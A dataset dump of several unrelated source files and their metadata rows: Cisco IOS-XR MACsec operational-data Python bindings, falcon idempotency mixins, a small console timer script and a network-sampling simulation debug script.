class MacsecCtrlrCiphersuitEnum(Enum):
"""
MacsecCtrlrCiphersuitEnum
Macsec ctrlr ciphersuit
.. data:: gcm_aes_256 = 0
GCM AES 256
.. data:: gcm_aes_128 = 1
GCM AES 128
.. data:: gcm_aes_xpn_256 = 2
GCM AES XPN 256
"""
gcm_aes_256 = 0
gcm_aes_128 = 1
gcm_aes_xpn_256 = 2
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_macsec_ctrlr_oper as meta
return meta._meta_table['MacsecCtrlrCiphersuitEnum']
class MacsecCtrlrStateEnum(Enum):
"""
MacsecCtrlrStateEnum
Macsec ctrlr state
.. data:: macsec_ctrlr_state_up = 0
Up
.. data:: macsec_ctrlr_state_down = 1
Down
.. data:: macsec_ctrlr_state_admin_down = 2
Administratively Down
"""
macsec_ctrlr_state_up = 0
macsec_ctrlr_state_down = 1
macsec_ctrlr_state_admin_down = 2
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_macsec_ctrlr_oper as meta
return meta._meta_table['MacsecCtrlrStateEnum']
class MacsecCtrlrOper(object):
"""
Macsec controller data
.. attribute:: macsec_ctrlr_ports
All Macsec Controller Port operational data
**type**\: :py:class:`MacsecCtrlrPorts <ydk.models.cisco_ios_xr.Cisco_IOS_XR_macsec_ctrlr_oper.MacsecCtrlrOper.MacsecCtrlrPorts>`
"""
_prefix = 'macsec-ctrlr-oper'
_revision = '2015-11-09'
def __init__(self):
self.macsec_ctrlr_ports = MacsecCtrlrOper.MacsecCtrlrPorts()
self.macsec_ctrlr_ports.parent = self
class MacsecCtrlrPorts(object):
"""
All Macsec Controller Port operational data
.. attribute:: macsec_ctrlr_port
Controller name
**type**\: list of :py:class:`MacsecCtrlrPort <ydk.models.cisco_ios_xr.Cisco_IOS_XR_macsec_ctrlr_oper.MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort>`
"""
_prefix = 'macsec-ctrlr-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.macsec_ctrlr_port = YList()
self.macsec_ctrlr_port.parent = self
self.macsec_ctrlr_port.name = 'macsec_ctrlr_port'
class MacsecCtrlrPort(object):
"""
Controller name
.. attribute:: name <key>
Port name
**type**\: str
**pattern:** (([a\-zA\-Z0\-9\_]\*\\d+/){3,4}\\d+)\|(([a\-zA\-Z0\-9\_]\*\\d+/){3,4}\\d+\\.\\d+)\|(([a\-zA\-Z0\-9\_]\*\\d+/){2}([a\-zA\-Z0\-9\_]\*\\d+))\|(([a\-zA\-Z0\-9\_]\*\\d+/){2}([a\-zA\-Z0\-9\_]+))\|([a\-zA\-Z0\-9\_\-]\*\\d+)\|([a\-zA\-Z0\-9\_\-]\*\\d+\\.\\d+)\|(mpls)\|(dwdm)
.. attribute:: macsec_ctrlr_info
Macsec Controller operational data
**type**\: :py:class:`MacsecCtrlrInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_macsec_ctrlr_oper.MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort.MacsecCtrlrInfo>`
"""
_prefix = 'macsec-ctrlr-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.name = None
self.macsec_ctrlr_info = MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort.MacsecCtrlrInfo()
self.macsec_ctrlr_info.parent = self
class MacsecCtrlrInfo(object):
"""
Macsec Controller operational data
.. attribute:: decrypt_sc_status
Decrypt Secure Channel Status
**type**\: :py:class:`DecryptScStatus <ydk.models.cisco_ios_xr.Cisco_IOS_XR_macsec_ctrlr_oper.MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort.MacsecCtrlrInfo.DecryptScStatus>`
.. attribute:: encrypt_sc_status
Encrypt Secure Channel Status
**type**\: :py:class:`EncryptScStatus <ydk.models.cisco_ios_xr.Cisco_IOS_XR_macsec_ctrlr_oper.MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort.MacsecCtrlrInfo.EncryptScStatus>`
.. attribute:: must_secure
Must Secure
**type**\: bool
.. attribute:: replay_window_size
Replay Window Size
**type**\: int
**range:** 0..4294967295
.. attribute:: state
State
**type**\: :py:class:`MacsecCtrlrStateEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_macsec_ctrlr_oper.MacsecCtrlrStateEnum>`
"""
_prefix = 'macsec-ctrlr-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.decrypt_sc_status = MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort.MacsecCtrlrInfo.DecryptScStatus()
self.decrypt_sc_status.parent = self
self.encrypt_sc_status = MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort.MacsecCtrlrInfo.EncryptScStatus()
self.encrypt_sc_status.parent = self
self.must_secure = None
self.replay_window_size = None
self.state = None
class EncryptScStatus(object):
"""
Encrypt Secure Channel Status
.. attribute:: active_association
Active Associations
**type**\: list of :py:class:`ActiveAssociation <ydk.models.cisco_ios_xr.Cisco_IOS_XR_macsec_ctrlr_oper.MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort.MacsecCtrlrInfo.EncryptScStatus.ActiveAssociation>`
.. attribute:: cipher_suite
Cipher Suite
**type**\: :py:class:`MacsecCtrlrCiphersuitEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_macsec_ctrlr_oper.MacsecCtrlrCiphersuitEnum>`
.. attribute:: confidentiality_offset
Confidentiality offset
**type**\: int
**range:** 0..4294967295
.. attribute:: max_packet_number
Max packet Number
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: protection_enabled
Protection Enabled
**type**\: bool
.. attribute:: recent_packet_number
Recent Packet Number
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: secure_channel_id
Secure Channel Id
**type**\: str
"""
_prefix = 'macsec-ctrlr-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.active_association = YList()
self.active_association.parent = self
self.active_association.name = 'active_association'
self.cipher_suite = None
self.confidentiality_offset = None
self.max_packet_number = None
self.protection_enabled = None
self.recent_packet_number = None
self.secure_channel_id = None
class ActiveAssociation(object):
"""
Active Associations
.. attribute:: association_number
Association Number
**type**\: int
**range:** 0..255
.. attribute:: short_secure_channel_id
Short secure channel id
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'macsec-ctrlr-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.association_number = None
self.short_secure_channel_id = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-macsec-ctrlr-oper:active-association'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.association_number is not None:
return True
if self.short_secure_channel_id is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_macsec_ctrlr_oper as meta
return meta._meta_table['MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort.MacsecCtrlrInfo.EncryptScStatus.ActiveAssociation']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set. Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-macsec-ctrlr-oper:encrypt-sc-status'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.active_association is not None:
for child_ref in self.active_association:
if child_ref._has_data():
return True
if self.cipher_suite is not None:
return True
if self.confidentiality_offset is not None:
return True
if self.max_packet_number is not None:
return True
if self.protection_enabled is not None:
return True
if self.recent_packet_number is not None:
return True
if self.secure_channel_id is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_macsec_ctrlr_oper as meta
return meta._meta_table['MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort.MacsecCtrlrInfo.EncryptScStatus']['meta_info']
class DecryptScStatus(object):
"""
Decrypt Secure Channel Status
.. attribute:: active_association
Active Associations
**type**\: list of :py:class:`ActiveAssociation <ydk.models.cisco_ios_xr.Cisco_IOS_XR_macsec_ctrlr_oper.MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort.MacsecCtrlrInfo.DecryptScStatus.ActiveAssociation>`
.. attribute:: cipher_suite
Cipher Suite
**type**\: :py:class:`MacsecCtrlrCiphersuitEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_macsec_ctrlr_oper.MacsecCtrlrCiphersuitEnum>`
.. attribute:: confidentiality_offset
Confidentiality offset
**type**\: int
**range:** 0..4294967295
.. attribute:: max_packet_number
Max packet Number
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: protection_enabled
Protection Enabled
**type**\: bool
.. attribute:: recent_packet_number
Recent Packet Number
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: secure_channel_id
Secure Channel Id
**type**\: str
"""
_prefix = 'macsec-ctrlr-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.active_association = YList()
self.active_association.parent = self
self.active_association.name = 'active_association'
self.cipher_suite = None
self.confidentiality_offset = None
self.max_packet_number = None
self.protection_enabled = None
self.recent_packet_number = None
self.secure_channel_id = None
class ActiveAssociation(object):
"""
Active Associations
.. attribute:: association_number
Association Number
**type**\: int
**range:** 0..255
.. attribute:: short_secure_channel_id
Short secure channel id
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'macsec-ctrlr-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.association_number = None
self.short_secure_channel_id = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set. Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-macsec-ctrlr-oper:active-association'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.association_number is not None:
return True
if self.short_secure_channel_id is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_macsec_ctrlr_oper as meta
return meta._meta_table['MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort.MacsecCtrlrInfo.DecryptScStatus.ActiveAssociation']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set. Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-macsec-ctrlr-oper:decrypt-sc-status'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.active_association is not None:
for child_ref in self.active_association:
if child_ref._has_data():
return True
if self.cipher_suite is not None:
return True
if self.confidentiality_offset is not None:
return True
if self.max_packet_number is not None:
return True
if self.protection_enabled is not None:
return True
if self.recent_packet_number is not None:
return True
if self.secure_channel_id is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_macsec_ctrlr_oper as meta
return meta._meta_table['MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort.MacsecCtrlrInfo.DecryptScStatus']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set. Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-macsec-ctrlr-oper:macsec-ctrlr-info'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.decrypt_sc_status is not None and self.decrypt_sc_status._has_data():
return True
if self.encrypt_sc_status is not None and self.encrypt_sc_status._has_data():
return True
if self.must_secure is not None:
return True
if self.replay_window_size is not None:
return True
if self.state is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_macsec_ctrlr_oper as meta
return meta._meta_table['MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort.MacsecCtrlrInfo']['meta_info']
@property
def _common_path(self):
if self.name is None:
raise YPYModelError('Key property name is None')
return '/Cisco-IOS-XR-macsec-ctrlr-oper:macsec-ctrlr-oper/Cisco-IOS-XR-macsec-ctrlr-oper:macsec-ctrlr-ports/Cisco-IOS-XR-macsec-ctrlr-oper:macsec-ctrlr-port[Cisco-IOS-XR-macsec-ctrlr-oper:name = ' + str(self.name) + ']'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.name is not None:
return True
if self.macsec_ctrlr_info is not None and self.macsec_ctrlr_info._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_macsec_ctrlr_oper as meta
return meta._meta_table['MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-macsec-ctrlr-oper:macsec-ctrlr-oper/Cisco-IOS-XR-macsec-ctrlr-oper:macsec-ctrlr-ports'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.macsec_ctrlr_port is not None:
for child_ref in self.macsec_ctrlr_port:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_macsec_ctrlr_oper as meta
return meta._meta_table['MacsecCtrlrOper.MacsecCtrlrPorts']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-macsec-ctrlr-oper:macsec-ctrlr-oper'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.macsec_ctrlr_ports is not None and self.macsec_ctrlr_ports._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_macsec_ctrlr_oper as meta
return meta._meta_table['MacsecCtrlrOper']['meta_info']
| 36.365152 | 293 | 0.484896 | 2,107 | 24,001 | 5.269103 | 0.076887 | 0.074311 | 0.04864 | 0.049 | 0.831652 | 0.809314 | 0.767429 | 0.750585 | 0.736624 | 0.733111 | 0 | 0.021171 | 0.445023 | 24,001 | 659 | 294 | 36.420334 | 0.812312 | 0.244573 | 0 | 0.772894 | 0 | 0.007326 | 0.115549 | 0.074863 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.054945 | 0.007326 | 0.527473 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
6e3aab5a4e5acdc23448e9a918e9557702641fc9 | 120 | py | Python | astropy_helpers/commands/setup_package.py | bsipocz/astropy-helpers | 4999df1cfb6a5022347b0cef9caf8a556517c625 | [
"PSF-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | 9 | 2019-12-06T13:12:33.000Z | 2021-10-05T12:47:15.000Z | astropy_helpers/commands/setup_package.py | bsipocz/astropy-helpers | 4999df1cfb6a5022347b0cef9caf8a556517c625 | [
"PSF-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | 2 | 2019-11-28T17:20:27.000Z | 2019-12-09T18:44:35.000Z | astropy_helpers/astropy_helpers/commands/setup_package.py | brechmos-stsci/deleteme | 02590bbe715750c908b6d8013b3ec935eeaf4040 | [
"BSD-3-Clause"
] | 3 | 2019-11-28T17:04:22.000Z | 2021-10-19T13:12:34.000Z | from os.path import join
def get_package_data():
return {'astropy_helpers.commands': [join('src', 'compiler.c')]}
| 20 | 68 | 0.7 | 17 | 120 | 4.764706 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 120 | 5 | 69 | 24 | 0.778846 | 0 | 0 | 0 | 0 | 0 | 0.308333 | 0.2 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
285210b9451d3bea7fb62b3971edaf68c42f171f | 970 | py | Python | falcon_idempotency/mixins.py | bhargavrpatel/falcon-idempotency | 6bfebff601edf47bdd7e027c266d6593cea46ee7 | [
"MIT"
] | 1 | 2019-07-07T07:21:12.000Z | 2019-07-07T07:21:12.000Z | falcon_idempotency/mixins.py | bhargavrpatel/falcon-idempotency | 6bfebff601edf47bdd7e027c266d6593cea46ee7 | [
"MIT"
] | 231 | 2019-02-05T00:50:32.000Z | 2022-03-31T11:17:02.000Z | falcon_idempotency/mixins.py | bhargavrpatel/falcon-idempotency | 6bfebff601edf47bdd7e027c266d6593cea46ee7 | [
"MIT"
] | 1 | 2019-02-05T00:48:43.000Z | 2019-02-05T00:48:43.000Z | class IdempotentPostMixin(object):
"""Idmepotent POST Mixin
A Mixin class which can be added to a resource to enable
idempotent POSTs.
Note
----
Usage of this mixin is completely optional. The implementation
simply checks for the existence of the resource instance variable rather
than checking MRO or something that might strictly necessitate the use
of this mixin.
"""
@property
def idempotent_post(self):
return True
class IdempotentDeleteMixin(object):
"""Idmepotent DELETE Mixin
A Mixin class which can be added to a resource to enable
idempotent DELETEs.
Note
----
Usage of this mixin is completely optional. The implementation
simply checks for the existence of the resource instance variable rather
than checking MRO or something that might strictly necessitate the use
of this mixin.
"""
@property
def idempotent_delete(self):
return True
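The docstrings above note that consumers are expected to check for the resource instance attribute rather than inspecting the MRO. A minimal sketch of that lookup — the `ItemResource` class and `wants_idempotent_post` helper below are hypothetical illustrations, not part of this package's API:

```python
class IdempotentPostMixin:
    """Stand-in for falcon_idempotency.mixins.IdempotentPostMixin above."""

    @property
    def idempotent_post(self):
        return True


class ItemResource(IdempotentPostMixin):
    """Hypothetical resource opting in to idempotent POSTs."""

    def on_post(self, req, resp):
        resp.media = {"status": "created"}


def wants_idempotent_post(resource):
    # Mirror the documented approach: look for the attribute itself
    # instead of checking the MRO with isinstance().
    return getattr(resource, "idempotent_post", False)
```

A middleware could call `wants_idempotent_post(resource)` before deciding whether to replay a cached response for a repeated idempotency key.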
| 24.871795 | 76 | 0.707216 | 124 | 970 | 5.516129 | 0.403226 | 0.035088 | 0.064327 | 0.046784 | 0.792398 | 0.792398 | 0.792398 | 0.792398 | 0.792398 | 0.792398 | 0 | 0 | 0.251546 | 970 | 38 | 77 | 25.526316 | 0.942149 | 0.685567 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0.25 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
28527752c856370e9e390284c1f6c596fae2122c | 12 | py | Python | _draft/answers/x_6_8.py | ofl/kuku2 | 7247fb1862d917d23258ebe7a93dca5939433225 | [
"MIT"
] | null | null | null | _draft/answers/x_6_8.py | ofl/kuku2 | 7247fb1862d917d23258ebe7a93dca5939433225 | [
"MIT"
] | 1 | 2021-11-13T08:03:04.000Z | 2021-11-13T08:03:04.000Z | _draft/answers/x_6_8.py | ofl/kuku2 | 7247fb1862d917d23258ebe7a93dca5939433225 | [
"MIT"
] | null | null | null | # x_6_8
#
#
| 3 | 7 | 0.416667 | 3 | 12 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 0.333333 | 12 | 3 | 8 | 4 | 0.125 | 0.416667 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
95adb48151c3b75d87822b5892bad406aa035d17 | 1,105 | py | Python | command/italiano/timer.py | LunarStone292/cento_bot | 744a189529a5be38d119085193a5ea623555a7ca | [
"MIT"
] | null | null | null | command/italiano/timer.py | LunarStone292/cento_bot | 744a189529a5be38d119085193a5ea623555a7ca | [
"MIT"
] | null | null | null | command/italiano/timer.py | LunarStone292/cento_bot | 744a189529a5be38d119085193a5ea623555a7ca | [
"MIT"
] | null | null | null | import time
import os
import platform
tempo = int(input("\n how many seconds should the timer last?: "))
if(platform.system() == "Windows"):
os.system("cls")
if(platform.system() == "Linux"):
os.system("clear")
print(" _ _ _ _ _ ")
print("| |_(_)_ __ ___ ___ _ __ _ __ __ _ _ __| |_(_) |_ ___ ")
print("| __| | '_ ` _ \ / _ \ '__| | '_ \ / _` | '__| __| | __/ _ \ ")
print("| |_| | | | | | | __/ | | |_) | (_| | | | |_| | || (_) | ")
print(" \__|_|_| |_| |_|\___|_| | .__/ \__,_|_| \__|_|\__\___/ ")
print(" |_| ")
time.sleep(tempo)
if(platform.system() == "Windows"):
os.system("cls")
if(platform.system() == "Linux"):
os.system("clear")
print(" _ _ _")
print("| |_(_)_ __ ___ ___ ___ _ _| |_")
print("| __| | '_ ` _ \ / _ \ / _ \| | | | __|")
print("| |_| | | | | | | __/ | (_) | |_| | |_")
print(" \__|_|_| |_| |_|\___| \___/ \__,_|\__|")
os.system("cd mp3 & Time-Up.mp3")
os.system("python3 language/italiano/console.py") | 33.484848 | 72 | 0.430769 | 72 | 1,105 | 4.763889 | 0.416667 | 0.262391 | 0.306122 | 0.291545 | 0.556851 | 0.542274 | 0.542274 | 0.542274 | 0.542274 | 0.542274 | 0 | 0.004 | 0.321267 | 1,105 | 33 | 73 | 33.484848 | 0.453333 | 0 | 0 | 0.307692 | 0 | 0.230769 | 0.616387 | 0.026071 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.115385 | 0 | 0.115385 | 0.423077 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
95cc0fd6de201f496df8fc404fa760469e8c0c8b | 5,948 | py | Python | RDS/code/misc_code/hom_debug_tests.py | chrisjcameron/chrisjcameron.github.io | 98bae30c1227465aba09ee50083688857b573cd5 | [
"MIT"
] | null | null | null | RDS/code/misc_code/hom_debug_tests.py | chrisjcameron/chrisjcameron.github.io | 98bae30c1227465aba09ee50083688857b573cd5 | [
"MIT"
] | null | null | null | RDS/code/misc_code/hom_debug_tests.py | chrisjcameron/chrisjcameron.github.io | 98bae30c1227465aba09ee50083688857b573cd5 | [
"MIT"
] | null | null | null | import attdist, simrdclass_collisions_recactByNode as rds, recact, reccho, seedchoice, graphgen as gg, graphmod as gm #RDS-dependent modules
import itertools, time, sys, random, math, string, subprocess as sub, networkx as nx, os, numpy as np #general modules
#------------------------------------
# A network composed of two random networks
G0 = nx.barabasi_albert_graph( 2000 , 100)
G1 = nx.barabasi_albert_graph( 2000, 100)
net0 = rds.RDNet(network=G0, attLevels= attLevels)
net1 = rds.RDNet(network=G1, attLevels= attLevels)
# Assign the site variable
attdist.all( net0, attIndex=0, param='0' )
attdist.all( net1, attIndex=0, param='1' )
# Assign the variable correlated with site
attdist.all( net0, attIndex=1, param='0' )
attdist.all( net1, attIndex=1, param='0' )
attdist.randProp( net0, attIndex=1, param=[.75, '1' ])
attdist.randProp( net1, attIndex=1, param=[.25, '1' ])
# Assign the variable uncorrelated with site
attdist.randProp( net0, attIndex=2, param=[.5, '1' ])
attdist.randProp( net1, attIndex=2, param=[.5, '1' ])
net0.absorb(net1)
mySim = rds.RDSim(RDNet=net0, seeds=10, reclimit=net0.network.order(), \
seedcho=seed_choice, seed_choice_params=seed_choice_params, \
rec=recruitment_activity_method, recparams = recruitment_parameters, rec_meth=rec_method)
net0.clear()
net1.clear()
mySim.reID()
# Calculate the fraction of in-group ties
within = [x for x in mySim.network.edges() if x[0].attlist[2]=='1' and x[1].attlist[2]=='1' ]
without1 = [x for x in mySim.network.edges() if x[0].attlist[2]=='1' and x[1].attlist[2]!='1' ]
without2 = [x for x in mySim.network.edges() if x[0].attlist[2]!='1' and x[1].attlist[2]=='1' ]
float(len(within)) / (len(without1)+len(without2)+len(within))
#------------------------------------
# A single BA network
G0 = nx.barabasi_albert_graph( 2000 , 100)
net0 = rds.RDNet(network=G0, attLevels= attLevels)
# Assign the site variable
attdist.all( net0, attIndex=0, param='0' )
# Assign the variable correlated with site
attdist.all( net0, attIndex=1, param='0' )
attdist.randProp( net0, attIndex=1, param=[.75, '1' ])
# Assign the variable uncorrelated with site
attdist.randProp( net0, attIndex=2, param=[.5, '1' ])
mySim = rds.RDSim(RDNet=net0, seeds=10, reclimit=net0.network.order(), \
seedcho=seed_choice, seed_choice_params=seed_choice_params, \
rec=recruitment_activity_method, recparams = recruitment_parameters, rec_meth=rec_method)
net0.clear()
mySim.reID()
# Calculate the fraction of in-group ties
within = [x for x in mySim.network.edges() if x[0].attlist[2]=='1' and x[1].attlist[2]=='1' ]
without1 = [x for x in mySim.network.edges() if x[0].attlist[2]=='1' and x[1].attlist[2]!='1' ]
without2 = [x for x in mySim.network.edges() if x[0].attlist[2]!='1' and x[1].attlist[2]=='1' ]
float(len(within)) / (len(without1)+len(without2)+len(within))
#------------------------------------
# A single WS network
G0 = nx.connected_watts_strogatz_graph( 2000 , 190, p=.15)
net0 = rds.RDNet(network=G0, attLevels= attLevels)
# Assign the site variable
attdist.all( net0, attIndex=0, param='0' )
# Assign the variable correlated with site
attdist.all( net0, attIndex=1, param='0' )
attdist.randProp( net0, attIndex=1, param=[.75, '1' ])
# Assign the variable uncorrelated with site
attdist.randProp( net0, attIndex=2, param=[.5, '1' ])
mySim = rds.RDSim(RDNet=net0, seeds=10, reclimit=net0.network.order(), \
seedcho=seed_choice, seed_choice_params=seed_choice_params, \
rec=recruitment_activity_method, recparams = recruitment_parameters, rec_meth=rec_method)
net0.clear()
mySim.reID()
# Calculate the fraction of in-group ties
within = [x for x in mySim.network.edges() if x[0].attlist[2]=='1' and x[1].attlist[2]=='1' ]
without1 = [x for x in mySim.network.edges() if x[0].attlist[2]=='1' and x[1].attlist[2]!='1' ]
without2 = [x for x in mySim.network.edges() if x[0].attlist[2]!='1' and x[1].attlist[2]=='1' ]
float(len(within)) / (len(without1)+len(without2)+len(within))
#------------------------------------
# A single ER (random) network
G0 = nx.erdos_renyi_graph( 2000, .098)
net0 = rds.RDNet(network=G0, attLevels= attLevels)
# Assign the site variable
attdist.all( net0, attIndex=0, param='0' )
# Assign the variable correlated with site
attdist.all( net0, attIndex=1, param='0' )
attdist.randProp( net0, attIndex=1, param=[.75, '1' ])
# Assign the variable uncorrelated with site
attdist.randProp( net0, attIndex=2, param=[.5, '1' ])
mySim = rds.RDSim(RDNet=net0, seeds=10, reclimit=net0.network.order(), \
seedcho=seed_choice, seed_choice_params=seed_choice_params, \
rec=recruitment_activity_method, recparams = recruitment_parameters, rec_meth=rec_method)
net0.clear()
mySim.reID()
# Calculate the fraction of in-group ties
within = [x for x in mySim.network.edges() if x[0].attlist[2]=='1' and x[1].attlist[2]=='1' ]
without1 = [x for x in mySim.network.edges() if x[0].attlist[2]=='1' and x[1].attlist[2]!='1' ]
without2 = [x for x in mySim.network.edges() if x[0].attlist[2]!='1' and x[1].attlist[2]=='1' ]
float(len(within)) / (len(without1)+len(without2)+len(within))
#---------
# Other interesting checks:
# Does this capture all the edges?
within2 = [x for x in mySim.network.edges() if x[0].attlist[2]=='0' and x[1].attlist[2]=='0' ]
within = [x for x in mySim.network.edges() if x[0].attlist[2]=='1' and x[1].attlist[2]=='1' ]
without1 = [x for x in mySim.network.edges() if x[0].attlist[2]=='1' and x[1].attlist[2]!='1' ]
without2 = [x for x in mySim.network.edges() if x[0].attlist[2]!='1' and x[1].attlist[2]=='1' ]
within2_len = len(within2)
within1_len = len(within)
without1_2_len = len(without1)
without2_1_len = len(without2)
sum([within2_len, within1_len, without1_2_len, without2_1_len])
mySim.network.size()
# These numbers are equal, so these 4 lists encompass all the ties
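The completeness check above relies on the attribute being binary, so the four lists partition the edge set. A pure-Python sketch of the same partition, with plain label pairs standing in for the edge objects (the labels below mimic `x[0].attlist[2]` / `x[1].attlist[2]`; this is illustrative, not the RDNet API):

```python
# Each edge is a pair of endpoint labels: '1' = in-group, '0' = out-group.
edges = [("1", "1"), ("1", "0"), ("0", "1"), ("0", "0"), ("1", "1")]

within = [e for e in edges if e[0] == "1" and e[1] == "1"]
within2 = [e for e in edges if e[0] == "0" and e[1] == "0"]
without1 = [e for e in edges if e[0] == "1" and e[1] != "1"]
without2 = [e for e in edges if e[0] != "1" and e[1] == "1"]

# With a binary attribute, the four lists partition the edge set,
# so their sizes must sum to the total number of edges.
total = len(within) + len(within2) + len(without1) + len(without2)
fraction_in_group = float(len(within)) / (len(without1) + len(without2) + len(within))
```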
